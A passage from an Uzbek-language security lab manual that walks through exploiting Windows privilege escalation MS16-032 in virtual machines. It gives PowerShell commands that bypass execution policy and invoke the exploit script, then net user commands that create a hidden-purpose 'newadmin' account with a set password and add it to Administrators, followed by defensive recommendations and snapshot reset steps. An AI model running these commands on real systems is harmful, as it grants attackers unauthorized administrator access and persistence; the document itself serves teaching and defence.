Powershell -ExecutionPolicy Bypass
Import-Module C:\Test\ms16-032.ps1
Invoke-ms16-032
81. Ochilgan yangi buyruq satri oynasida whoami /user buyrug'ini bajaring, olingan ma'lumotlarni ko'rib chiqing. Quyidagi buyruqlar ketma-ket:
Net user newadmin /add
Net user newadmin P@ssw0rd
Net localgroup Administrators newadmin /add
82. Ish stolida o'ng tugmasini bosing bu kompyuter va tanlash boshqarish. Hisobga olish ma'lumotlarini so'rash oynasida p@ssw0rd paroli bilan newadmin-dan foydalaning.
83. Ochilgan kompyuter boshqaruv konsolida tizim vositalarini , mahalliy foydalanuvchilarni va guruhlarni ketma-ket joylashtiring. Newadmin foydalanuvchi xususiyatlarini oching va Administratorlar guruhining bir qismi ekanligiga ishonch hosil qiling.
Eslatma: ushbu turdagi hujumlarga qarshi himoya qilish uchun, masalan, operatsion tizimlar va dasturiy ta'minotni yangilangan holatda (WSUS) ushlab turish, buyruq qatori va powershellni ishga tushirishni oldini olish uchun dasturni ishga tushirishni nazorat qilish siyosatidan foydalanish, cheklangan guruh siyosatini qo'llash, faqat domen foydalanuvchilari uchun resurslardan foydalanishni cheklash.
Keyingi laboratoriya ishlariga tayyorgarlik
1. VMware Workstation oynasida virtual mashinani o'ng tugmasini bosing
Workstation, Status rasmiga o'ting va workstation_start rasmini tanlang.
2. Ogohlantirish oynasida Ha ni bosing.
3. DC virtual mashinasi uchun 1-2 qadamlarni takrorlang.
Do'stlaringiz bilan baham: | 
